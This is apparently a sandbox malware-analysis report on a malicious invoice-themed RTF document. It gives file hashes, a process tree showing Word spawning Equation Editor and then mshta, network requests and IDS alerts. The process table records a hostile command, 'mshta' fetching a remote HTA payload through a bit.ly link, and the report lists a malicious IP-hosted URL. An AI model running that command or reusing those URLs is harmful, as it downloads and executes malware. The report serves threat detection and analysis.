File name: | INVOICE-PAYABLE.doc |
Full analysis: | https://app.any.run/tasks/307fc3b1-091f-4a22-a3f5-35863f09a7ac |
Verdict: | Malicious activity |
Analysis date: | January 22, 2019, 16:18:59 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 22AE4770C52BA52D3903F793077D08DB |
SHA1: | 6FCC981D1EED959B882CC1000D52C2D85D9927D4 |
SHA256: | D61DE8795F216BA737FF46FE538883E34DC37815168B378B0219357AE03EEBBD |
SSDEEP: | 6144:ZxNeokNm+xxeeeeeeeNfi53V4I9EcfyuusZT:OV |
.rtf | | | Rich Text Format (100) |
---|
Author: | - |
---|---|
LastModifiedBy: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2868 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\INVOICE-PAYABLE.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3440 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
1812 | mshta http://bit.ly/2MqLO0Y &AAAAAAAAAAAAAAAC | C:\Windows\system32\mshta.exe | EQNEDT32.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR88AE.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1812 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bit[1].txt | text | |
MD5:C24041175D3B75D913B73A80C0B3B097 | SHA256:C4A5E7DB5E65712D17E95F84087D0844CA9F738D38CE1348027F1DEC7BF50A81 | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$VOICE-PAYABLE.doc | pgc | |
MD5:F2A0A07878DA96F9BB781B114D9C9FCE | SHA256:2B47CDECC8B2BD2CF36E4A05AC772349591F7AD082DF238D59FC7B2D000C563F | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:BCA7725C8CB9C8D63EC166E879124B21 | SHA256:05E75A6D04CEFC391DEAF88AFF57A37ECFC5F3AF4F711DC7518EB32A07640D73 | |||
1812 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\ampps_logo[1].png | image | |
MD5:861CAA09102020CAF780BD167DF33EF5 | SHA256:6B13830C6527A862A4C652F6767107B6F6BD94BE4918997A363CE20AF2AB6071 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1812 | mshta.exe | GET | 301 | 67.199.248.10:80 | http://bit.ly/2MqLO0Y | US | html | 116 b | shared |
1812 | mshta.exe | GET | 404 | 194.36.173.46:80 | http://194.36.173.46/blue.hta | unknown | html | 448 b | malicious |
1812 | mshta.exe | GET | 200 | 192.198.80.3:80 | http://www.softaculous.com/website/images/ampps/ampps_logo.png | US | image | 9.33 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1812 | mshta.exe | 67.199.248.10:80 | bit.ly | Bitly Inc | US | shared |
1812 | mshta.exe | 192.198.80.3:80 | www.softaculous.com | Centrilogic, Inc. | US | suspicious |
1812 | mshta.exe | 194.36.173.46:80 | — | — | — | malicious |
Domain | IP | Reputation |
---|---|---|
bit.ly |
| shared |
www.softaculous.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
1812 | mshta.exe | A Network Trojan was detected | MALWARE [PTsecurity] PowerShell.Downloader httpHeader |
1812 | mshta.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious downloader - bit.ly redirect to .hta object |
1812 | mshta.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious downloader - redirect to .hta object |
1812 | mshta.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTA application download |
1812 | mshta.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
1812 | mshta.exe | Attempted User Privilege Gain | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |